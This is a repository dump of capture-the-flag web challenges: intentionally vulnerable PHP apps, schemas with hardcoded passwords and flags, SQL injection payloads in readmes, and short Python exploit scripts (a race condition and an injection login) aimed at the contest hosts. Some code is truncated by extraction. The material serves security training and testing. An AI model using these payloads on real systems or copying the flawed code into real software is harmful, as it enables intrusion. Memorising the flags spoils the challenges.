20 | 21 | payload : 22 | email=1&title=1\&contents=,if((select substr(password,1,1) from users where 1)='t', (select 1 union select 2), 2));# 23 | 24 | exploit : ./exploit.py 25 | ~~~ 26 | --------------------------------------- 27 | 플래그 : flag{s1mple_SQL_1n73ction_XD} 28 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/adm1n.htm: -------------------------------------------------------------------------------- 1 | flag{s1mple_SQL_1n73ction_XD}'; 6 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/config.htm: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/index.htm: -------------------------------------------------------------------------------- 1 | location.href='?p=home';"); 3 | if(preg_match("/adm1n/i", $_GET['p'])) exit('nope'); 4 | 5 | require($_GET['p'].".htm"); -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/src/logout.htm: -------------------------------------------------------------------------------- 1 | location.href='?p=home';"); 6 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/basic_web/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `message` ( 5 | `email` varchar(100) NOT NULL, 6 | `title` varchar(100) NOT NULL, 7 | `contents` varchar(100) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 9 | 10 | CREATE TABLE IF NOT EXISTS `users` ( 11 | `username` varchar(100) NOT NULL, 12 | `password` varchar(100) NOT NULL, 13 | PRIMARY KEY (`username`) 14 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 15 | 16 | 
INSERT INTO `users` (`username`, `password`) VALUES 17 | ('admin', 'th1sisp4ssw0rd'); -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/readme.md: -------------------------------------------------------------------------------- 1 | # Power of Xx 2017 2 | ~~~ 3 | * 이름 : 문시우 4 | 5 | * 문제명 : sqlgame 6 | 7 | * 난이도 : 하 8 | 9 | * 분야 : 웹 10 | ~~~ 11 | 12 | - payload 13 | ~~~ 14 | ?vuln=1%20union%20select%200x303037,1,1%23%27%20union%20select%201,0x62616e67,schema()%23"%20union%20select%201,2,%27007%27%23 15 | ~~~ 16 | 17 | ---------------------------------- 18 | 19 | flag : flag{good_good_very_good} 20 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/assets/adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/power_of_xx_2017/sqlgame/src/assets/adfsadfasdfasdfasdfasdf31!@$&(^^&^!@aag12345.png -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/assets/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2017/power_of_xx_2017/sqlgame/src/assets/logo.png -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/config.php: -------------------------------------------------------------------------------- 1 | Congratulation!!!!
"; 8 | ?> -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/src/index.php: -------------------------------------------------------------------------------- 1 | '; 27 | 28 | if(isset($_GET['view-source'])){ 29 | highlight_file(__FILE__) and die(); 30 | } 31 | 32 | ?> 33 | 34 | 35 | 36 | sqlgame 37 | 38 | 39 | 40 |
41 |
42 |
43 | 44 | 45 |
46 | source 47 |
48 | 49 | -------------------------------------------------------------------------------- /2017/power_of_xx_2017/sqlgame/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE IF NOT EXISTS `users` ( 5 | `usercode` varchar(100) NOT NULL, 6 | `username` varchar(100) NOT NULL, 7 | `password` varchar(100) NOT NULL 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -------------------------------------------------------------------------------- /2017/simple_login/config.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2017/simple_login/index.php: -------------------------------------------------------------------------------- 1 | 55 | 56 | 57 | 58 | 59 | ? 60 | 61 | 62 |
63 |

Login

64 |
65 | 66 | 67 | 68 |
69 |
70 |

Join

71 |
72 | 73 | 74 |
75 |
76 | 79 |
80 | 81 | -------------------------------------------------------------------------------- /2017/simple_login/table.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 2 | SET NAMES UTF8; 3 | 4 | CREATE TABLE `users` ( 5 | `login_id` varchar(64) NOT NULL, 6 | `login_pw` varchar(64) NOT NULL, 7 | `login_name` varchar(128) NOT NULL 8 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; 9 | 10 | INSERT INTO `users` (`login_id`, `login_pw`, `login_name`) VALUES 11 | ('**secret**', '**secret**', '**secret**'), 12 | ('**secret**', '**secret**', '**secret**'), 13 | ('**secret**', '**secret**', '**secret**'), 14 | ('**secret**', '**secret**', '**secret**'), 15 | ('**secret**', '**secret**', '**secret**'); -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Margaret (Web - 250pts) 3 | #### solver : 2 (jinmoxjinmo123, JeonYoungSin) 4 | 5 | This is an `RCE` via `session lfi` challenge. 6 | I made it for the `2018 layer7 ctf`. 7 | 8 | * Environment 9 | * Apache/2.4.18 (Ubuntu) 10 | * PHP 7.0.28-0ubuntu0.16.04.1 11 | * sqlite 3.11.0 12 | ----------------- 13 | ### php.ini - disable_functions 14 | ``` 15 | disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled, 16 | pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error, 17 | pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, 18 | system,passthru,exec,shell_exec 19 | ``` 20 | ----------------- 21 | 22 | A revenge version of this challenge is ready. 23 | Please contact me if you need the revenge version.
24 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/db/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/2018_Layer7_CTF_Margaret/db/database.db -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | 3 | RewriteRule "^public($|/.*)" - [L] 4 | RewriteRule "^(.*)$" "index.php?p=$1" [QSA,NC,L] 5 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/Controller.class.php: -------------------------------------------------------------------------------- 1 | login($_POST); 30 | break; 31 | case 'register.html' : 32 | $User->register($_POST); 33 | break; 34 | default : 35 | break; 36 | } 37 | 38 | } 39 | 40 | else { // GET 41 | $Render->render_template('header.html'); 42 | $Render->render_template($page); 43 | $Render->render_template('footer.html'); 44 | } 45 | } 46 | 47 | public function filename($name) { 48 | return pathinfo($name)['filename']; 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/Render.class.php: -------------------------------------------------------------------------------- 1 | menu_loader(), $html); 14 | echo preg_replace('/\n+|\t+|\s{2}/', '', $html); // render 15 | break; 16 | case 'mypage.html' : 17 | $html = file_get_contents($file); 18 | $fetch = array_map('htmlspecialchars', $this->mypage_loader($_SESSION['username'])); 19 | $html = str_replace('{USERNAME}', $fetch['username'], $html); 20 | $html = str_replace('{PASSWORD}', $fetch['password'], $html); 21 | echo preg_replace('/\n+|\t+|\s{2}/', '', 
$html); // render 22 | break; 23 | default : 24 | include $file; 25 | break; 26 | } 27 | } 28 | 29 | private function menu_loader() { 30 | $menu_list = isset($_SESSION['username']) ? 31 | ['home'=>'/home.html', 'mypage'=>'/mypage.html', 'logout'=>'/logout.html'] : 32 | ['home'=>'/home.html', 'login'=>'/login.html', 'register'=>'/register.html']; 33 | 34 | $result = ''; 35 | foreach($menu_list as $menu=>$url) { 36 | $result .= '"; 38 | } 39 | $result .= '
'. 37 | "{$menu}
'; 40 | 41 | return $result; 42 | } 43 | 44 | private function mypage_loader($username) { 45 | $username = anti_sqli($username); 46 | $query = $this->query("SELECT * FROM `users` WHERE `username`='{$username}';"); 47 | return $query->fetchArray(); 48 | } 49 | 50 | } 51 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/classes/User.class.php: -------------------------------------------------------------------------------- 1 | query($query); 15 | 16 | if($fetch = $query->fetchArray()) { 17 | $_SESSION['username'] = $fetch['username']; 18 | go('/home.html', 'login success'); 19 | } 20 | 21 | die('

login failed.

'); // login fail 22 | } 23 | 24 | /* Registers a new account from the submitted fields: rejects usernames containing whitespace, "admin" or "_", rejects duplicates, then inserts the username and the password() digest. Always ends the request through die() or go(). */ public function register($data) { 25 | $data = array_map('anti_sqli', $data); // doubles single quotes in every field before the values are interpolated into the SQL strings below 26 | 27 | $username = $data['username']; 28 | $password = password($data['password']); 29 | 30 | if(preg_match("/(\s|admin|_)/i", $username, $matche)) { 31 | die('keyword "'.$matche[0].'" is not allowed'); 32 | } 33 | 34 | if(strlen($password) < 5) { // NOTE(review): $password is already the hex digest returned by password(), so this minimum-length check cannot fail; it presumably meant to test $data['password'] 35 | die('password is too short'); 36 | } 37 | 38 | $query = "SELECT * FROM `users` WHERE `username`='{$username}';"; 39 | $query = $this->query($query); 40 | if($query->fetchArray()) die('already exists'); 41 | 42 | $query = "INSERT INTO `users` VALUES ('{$username}', '{$password}');"; 43 | $query = $this->query($query); // NOTE(review): both statements are built by string interpolation and depend on anti_sqli(); bound parameters would remove that dependency 44 | 45 | go('/login.html', 'register success'); 46 | } 47 | 48 | } 49 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/config/config.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 6 | $execute .= strlen($msg) ?
"alert(\"{$msg}\");" : ""; 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($msg = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti lfi -- NOTE(review): one str_replace('../') pass plus an 'html' suffix test is a blocklist, not path confinement, and the function returns NULL when the suffix test fails; prefer basename() against a fixed template directory or an explicit allow-list of page names 17 | $page = strtolower(trim($page)); 18 | $page = str_replace(chr(0), '', $page); 19 | $page = str_replace('../', '', $page); 20 | if(substr($page, -4, 4) == 'html') return $page; 21 | } 22 | 23 | function password($password) { // NOTE(review): chained fast hashes (md5 -> sha1 -> sha256) with the single __SALT__ constant; password_hash()/password_verify() provide per-user salts and a tunable work factor 24 | return hash('sha256', sha1(md5($password).__SALT__)); 25 | } 26 | 27 | function anti_sqli($data) { // anti sqlite injection -- NOTE(review): quote doubling only protects values placed inside single-quoted SQL literals and has to be applied at every use; prepared statements are the robust alternative 28 | return str_replace("'", "''", $data); 29 | } 30 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/index.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | simple mvc project 5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | {MENU} -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/home.html: -------------------------------------------------------------------------------- 1 |

Margaret

2 | -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/login.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

login

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/logout.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/mypage.html: -------------------------------------------------------------------------------- 1 |

mypage

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
Username :  {USERNAME}
Password :  {PASSWORD}
-------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/need_session/logout.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/need_session/mypage.html: -------------------------------------------------------------------------------- 1 | 0 -------------------------------------------------------------------------------- /2018/2018_Layer7_CTF_Margaret/html/templates/register.html: -------------------------------------------------------------------------------- 1 | 13 | 14 |

register

15 |
16 |
17 |
18 | 19 |
20 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/board.class.php: -------------------------------------------------------------------------------- 1 | query($query); 13 | $posts = ''; 14 | 15 | while($fetch = $this->fetch($query)) { 16 | $fetch = array_map('htmlspecialchars', $fetch); 17 | $post = preg_replace("/\[title\]/", $fetch['title'], $board_frame); 18 | $post = preg_replace("/\[content\]/", $fetch['content'], $post); 19 | $posts .= $post; 20 | } 21 | 22 | return $posts; 23 | } 24 | 25 | public function insert_data($data, $username) { // write 26 | $data = array_map('addslashes', $data); 27 | $title = $data['title']; 28 | $content = $data['content']; 29 | 30 | $query = "select count(*) as `no` from board;"; 31 | $fetch = $this->fetch($this->query($query)); 32 | 33 | $insert_no = (int)$fetch['no'] + 1; 34 | $query = "insert into board values "; 35 | $query .= "($insert_no, '{$title}', '{$content}', '{$username}');"; 36 | 37 | $this->query($query) or die('insert failed.'); 38 | 39 | return true; 40 | } 41 | 42 | } 43 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/database.class.php: -------------------------------------------------------------------------------- 1 | conn = mysqli_connect( 9 | $conn['host'], $conn['user'], 10 | $conn['pass'], $conn['name'] 11 | ) or die('sql server down'); 12 | } 13 | 14 | protected function fetch($query) { 15 | return mysqli_fetch_assoc($query); 16 | } 17 | 18 | protected function query($query) { 19 | return mysqli_query($this->conn, $query); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/classes/user.class.php: -------------------------------------------------------------------------------- 1 | query($query); 16 | 17 | if($fetch = $this->fetch($query)) { 18 | return $fetch; 19 | } 
20 | 21 | return false; 22 | } 23 | 24 | /* Creates an account: escapes and truncates the submitted fields, runs check_names(), then inserts the row. Returns the validation message from check_names() on rejection and false on success. */ public function user_join($user) { 25 | $user = array_map('addslashes', $user); // anti sql injection -- NOTE(review): addslashes() is character escaping, not parameterisation; the Database class in this project wraps mysqli, whose prepared statements are the robust fix 26 | $nickname = substr($user['nickname'], 0, 100); // anti sql truncate attack -- NOTE(review): the cut happens AFTER addslashes(), so it can split an escape pair and leave a lone trailing backslash in the value; truncate or length-check the raw input first, then escape or bind it 27 | $username = substr($user['username'], 0, 100); // anti sql truncate attack (same caveat as $nickname) 28 | $password = sha1(md5($user['password'])); // NOTE(review): unsalted fast hashes; password_hash()/password_verify() is the standard replacement 29 | 30 | if($message = $this->check_names($nickname, $username)) { // call name check function 31 | return $message; 32 | } 33 | 34 | $query = "insert into users values ('{$nickname}', '{$username}', '{$password}');"; 35 | $this->query($query) or die($query); // NOTE(review): on failure this prints the complete SQL statement, including the password hash, to the client; log it server-side and return a generic error 36 | 37 | return false; 38 | } 39 | 40 | /* Validates a nickname/username pair. Returns an error message string when either is shorter than MINIMUM_LEN, contains '<' or '>', or already exists; returns false when the pair is acceptable. */ private function check_names($nickname, $username) { 41 | $nickname_length = mb_strlen($nickname, 'UTF-8'); 42 | $username_length = mb_strlen($username, 'UTF-8'); 43 | 44 | $query = "select * from users where "; 45 | $query .= "nickname='{$nickname}' or username='{$username}';"; // values arrive already escaped and truncated by user_join() and are interpolated as-is 46 | $query = $this->query($query); 47 | 48 | if($nickname_length < MINIMUM_LEN || $username_length < MINIMUM_LEN) { // length check 49 | return 'nickname or username is too short.'; 50 | } 51 | if(preg_match('/<|>/', $nickname.$username)) { // xss check -- NOTE(review): rejecting only '<' and '>' is a blocklist; encoding on output is the reliable control 52 | return 'nickname or username contains an html tag.'; 53 | } 54 | if($this->fetch($query)) { // duplicate check 55 | return 'already exists nickname or username.'; 56 | } 57 | 58 | return false; // pass 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/config/dbconfig.php: -------------------------------------------------------------------------------- 1 | location.href=\"?p={$locate}\";"; 6 | $execute .= strlen($message) ?
"alert(\"{$message}\");" : ""; 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($message = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti hack 17 | $page = strtolower(trim($page)); 18 | $page = str_replace(chr(0), '', $page); 19 | $page = str_replace('../', '', $page); 20 | if(substr($page, -4, 4) == 'html') { 21 | return $page; 22 | } 23 | die('403 forbidden.'); 24 | } 25 | 26 | function secure_waf() { // anti hack 27 | $regex = "/information_schema|union.*select|"; 28 | $regex .= " 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/goodaegi_board.sql: -------------------------------------------------------------------------------- 1 | SET NAMES UTF8; 2 | 3 | CREATE TABLE IF NOT EXISTS `board` ( 4 | `no` varchar(100), 5 | `title` varchar(100), 6 | `content` varchar(100), 7 | `username` varchar(100), 8 | PRIMARY KEY(`no`) 9 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 10 | 11 | CREATE TABLE IF NOT EXISTS `users` ( 12 | `nickname` varchar(100), 13 | `username` varchar(100), 14 | `password` varchar(100) 15 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 16 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/header.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | goodaegi board 13 | 14 | 15 | 39 |
40 |
41 |
42 |
43 |

Goodaegi board

44 |

45 | 52 |

53 |
54 |
55 |
56 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/index.php: -------------------------------------------------------------------------------- 1 | 2 |
3 |
4 |

[title]


5 |

[content]

6 |
7 |
8 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/board_footer.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/board_header.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 | Insert data 6 |
7 |
8 | 9 |
10 | -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/home.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
Goodaegi board is goodaegi.
9 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
Goodaegi board is simple.
18 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
Goodaegi board is free.
29 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
Goodaegi board is awesome.
38 |

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam ligula sapien, rutrum sed vestibulum eget, rhoncus ac erat.

39 |
40 |
41 |
42 |
43 |
44 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/insert.html: -------------------------------------------------------------------------------- 1 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/join.html: -------------------------------------------------------------------------------- 1 |
10 | 11 |  nickname or username must be at least 5 characters. 12 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/goodaegi_board/templates/login.html: -------------------------------------------------------------------------------- 1 |
-------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/sqlgame_revenge/config.php: -------------------------------------------------------------------------------- 1 | H3X0R{33e136c7d5b6e04331461ded400d59bf62b1c233}"; 8 | exit; 9 | } 10 | 11 | function view_source() { 12 | show_source('index.php'); 13 | exit; 14 | } 15 | 16 | ?> -------------------------------------------------------------------------------- /2018/H3X0R-CTF-2018/sqlgame_revenge/index.php: -------------------------------------------------------------------------------- 1 | 25)) or die('403 forbidden.'); 33 | 34 | $query = "select * from sqlgame_revenge where username='{$username}' and password='{$password}'"; 35 | $query = mysqli_query($conn, $query) or die('syntax error.'); 36 | $fetch = mysqli_fetch_assoc($query) or die('user not found.'); 37 | $fetch = array_map('strtolower', $fetch); 38 | 39 | (strtolower($fetch['username']) == 'munsiwoo') or die('who are you?'); 40 | (strtolower($fetch['password']) == $password) or die('pw incorrect!'); 41 | 42 | show_flag(); 43 | 44 | 45 | -------------------------------------------------------------------------------- /2018/count/exploit/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import threading 3 | # made by munsiwoo 4 | # description : race condition in the php between file_put_contents and file_get_contents function 5 | 6 | def request(sandbox) : 7 | global response 8 | uri = 'http://game.withphp.com/ouya/sandbox/' + sandbox 9 | response = requests.get(uri).text 10 | 11 | if __name__ == '__main__' : 12 | sandbox = '80e30ab2318c6a531cdde54c009a54ca/' 13 | response = '' 14 | 15 | while True : 16 | threading.Thread(target=request, args=(sandbox,)).start() 17 | if(response.find('Sunrin{') != -1) : # flag format is Sunrin{...} 18 | print(response) 19 | break 20 | 21 | print('End') 
-------------------------------------------------------------------------------- /2018/count/exploit/php_file_put_contents_race_condition.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/count/exploit/php_file_put_contents_race_condition.png -------------------------------------------------------------------------------- /2018/count/www/flag-6ece7416.php: -------------------------------------------------------------------------------- 1 |

'; 19 | die('your sandbox is here'); 20 | } 21 | 22 | mkdir($sandbox_dir, 0777); 23 | 24 | $source = file_get_contents('template.tpl'); 25 | $source = str_replace('[rand]', random_generator(8), $source); 26 | $flag = file_get_contents('flag-6ece7416.php'); 27 | 28 | file_put_contents($sandbox_dir.'index.php', $source); 29 | file_put_contents($sandbox_dir.'flag.php', $flag); 30 | 31 | echo '

'; 32 | die('your sandbox is here'); 33 | } 34 | ?> 35 | 36 | 37 | 38 | 39 | 40 | 41 |
42 |

Do you want to start challenge?

43 | 44 |
45 | 46 | -------------------------------------------------------------------------------- /2018/count/www/template.tpl: -------------------------------------------------------------------------------- 1 | 32 |
source 33 | -------------------------------------------------------------------------------- /2018/hackingcamp18/db/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/hackingcamp18/db/database.db -------------------------------------------------------------------------------- /2018/hackingcamp18/exploit.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | # pretty shop write up 3 | 4 | def main() : 5 | username = "username=-1'/**/and/**/0/**/or/**/username='admi'||'n';--" 6 | data = {"username": username, "password": "12345"} 7 | r = post('http://layer7.kr:6005/register', data=data) 8 | 9 | r = post('http://layer7.kr:6005/login', data=data) 10 | cookies = {'PHPSESSID':r.cookies['PHPSESSID']} 11 | 12 | get_flag = post('http://layer7.kr:6005/buy', data={'item':'flag'}, cookies=cookies) 13 | print(get_flag.text) 14 | 15 | if __name__ == '__main__' : 16 | main() 17 | 18 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteRule "^public($|/.*)" - [L] 3 | RewriteRule "^(.*)$" "index.php?p=$1" [QSA,NC,L] 4 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Controller.class.php: -------------------------------------------------------------------------------- 1 | login($_POST); 27 | } 28 | else if($page == 'register' && $method == 'POST') { 29 | $User->register($_POST); 30 | } 31 | else if($page == 'buy' && $method == 'POST') { 32 | $Shop->buy($_POST); 33 | } 34 | else { // GET 35 | $Render->render_template('header'); 36 | $Render->render_template($page); 37 | $Render->render_template('footer'); 38 | } 39 | } 40 | } 41 | 
-------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Render.class.php: -------------------------------------------------------------------------------- 1 | menu_loader(), $html); 13 | } 14 | if($page == 'mypage') { 15 | $username = anti_sqli($_SESSION['username']); // the session value is quote-escaped here before it is interpolated into the query 16 | $query = $this->query("SELECT * FROM `users` WHERE `username`='{$username}';"); 17 | $fetch = array_map('htmlspecialchars', $query->fetchArray()); // HTML-encodes every column before substitution into the template; NOTE(review): presumably fetchArray() yields false when no row matches, which array_map() does not accept -- confirm 18 | 19 | $html = str_replace('{USERNAME}', $fetch['username'], $html); 20 | $html = str_replace('{MONEY}', $fetch['money'], $html); 21 | } 22 | 23 | echo preg_replace('/\n+|\t+/', '', $html); // render 24 | } 25 | 26 | /* Builds the navigation menu markup: sessions with a username get home/shop/mypage/logout, all others get home/shop/login/register. */ public function menu_loader() { 27 | $menu_list = isset($_SESSION['username']) ? 28 | ['home', 'shop', 'mypage', 'logout'] : ['home', 'shop', 'login', 'register']; 29 | 30 | $result = ""; 31 | foreach($menu_list as $menu) { 32 | $result .= ""; 34 | } 35 | return $result."
". 33 | "{$menu}
"; 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/Shop.class.php: -------------------------------------------------------------------------------- 1 | query($user_query); 11 | $user_fetch = $user_query->fetchArray(); 12 | 13 | return $user_fetch; 14 | } 15 | 16 | /* Looks up one row of the shop table by item name and redirects to /shop when nothing matches. $item is interpolated as-is, so the caller must have escaped it. */ private function get_item_information($item) { 17 | $item_query = "SELECT * FROM `shop` WHERE `item`='{$item}';"; 18 | $item_query = $this->query($item_query); 19 | $item_fetch = $item_query->fetchArray(); 20 | 21 | if(!$item_fetch) { 22 | go('/shop', 'selected item does not exist.'); 23 | } 24 | 25 | return $item_fetch; 26 | } 27 | 28 | /* Writes the new balance for one user; both arguments are interpolated into the UPDATE statement as given. */ private function update_balance($username, $balance) { 29 | $update_query = "UPDATE `users` SET `money`='{$balance}' WHERE `username`='{$username}';"; 30 | $this->query($update_query); 31 | 32 | return true; 33 | } 34 | 35 | /* Purchases the item named in $data['item'] for the logged-in user: loads the item and user rows, checks the balance, stores the reduced balance and shows the item's content through go(). */ public function buy($data) { 36 | if(!isset($_SESSION['username'])) { 37 | go('/login', 'please login first.'); 38 | } 39 | $data = array_map('anti_sqli', $data); 40 | 41 | $item = $this->get_item_information($data['item']); 42 | $user = $this->get_user_information($_SESSION['username']); // NOTE(review): $_SESSION['username'] is passed without anti_sqli(), while $data above and $user['username'] below are escaped; the session value is the raw string read back from the database at login, so it should be escaped or, better, bound as a parameter (the query-building lines of get_user_information() are not visible in this listing) 43 | 44 | $item_price = (int)$item['price']; 45 | $user_money = (int)$user['money']; 46 | if($user_money < $item_price && $user['username'] != 'admin') { // NOTE(review): a row whose username equals 'admin' skips the balance check, so this branch depends entirely on which row get_user_information() returned 47 | go('/shop', 'not enough coin!'); 48 | } 49 | 50 | $username = anti_sqli($user['username']); 51 | $balance = $user_money - $item_price; 52 | $this->update_balance($username, $balance); 53 | 54 | echo ''; 55 | go('/shop', $item['content']); 56 | } 57 | 58 | 59 | } 60 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/classes/User.class.php: -------------------------------------------------------------------------------- 1 | query($query); 17 | $fetch = $query->fetchArray(); 18 | 19 | if($fetch['username']) { 20 | $_SESSION['username'] = $fetch['username']; 21 | go('/home',
'login success'); 22 | } 23 | 24 | die('

login failed.

'); // login failed 25 | } 26 | 27 | /* Registers a new account: rejects usernames containing whitespace, "admin" or "_", passwords shorter than 5 characters and duplicate usernames, then inserts the row with a starting balance of 100. Always ends the request through die() or go(). */ public function register($data) { 28 | $data = array_map('anti_sqli', $data); // doubles single quotes in every field before the values are interpolated into the SQL strings below 29 | 30 | if(preg_match("/(\s|admin|_)/i", $data['username'], $matche)) { 31 | die('keyword "'.$matche[0].'" is not allowed'); 32 | } 33 | 34 | if(strlen($data['password']) < 5) { 35 | die('password is too short'); 36 | } 37 | 38 | $query = "SELECT * FROM `users` WHERE `username`='{$data['username']}';"; 39 | $query = $this->query($query); 40 | if($query->fetchArray()) die('already exists'); 41 | 42 | $query = "INSERT INTO `users` VALUES ('{$data['username']}', '{$data['password']}', 100);"; 43 | $query = $this->query($query); // NOTE(review): the password is stored exactly as submitted (no hashing is visible in this function); password_hash()/password_verify() is the standard approach 44 | 45 | go('/login', 'register success'); 46 | } 47 | 48 | } 49 | -------------------------------------------------------------------------------- /2018/hackingcamp18/html/config/config.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 6 | $execute .= strlen($msg) ? "alert(\"{$msg}\");" : ""; // NOTE(review): $url and $msg are interpolated into the emitted script without JavaScript/HTML escaping; encode them (e.g. json_encode()) if they can ever carry user- or database-supplied text 7 | $execute .= ""; die($execute); 8 | } 9 | 10 | function back($msg = "") { // history back 11 | $execute = ""; die($execute); 14 | } 15 | 16 | function secure_page($page) { // anti lfi -- basename() drops 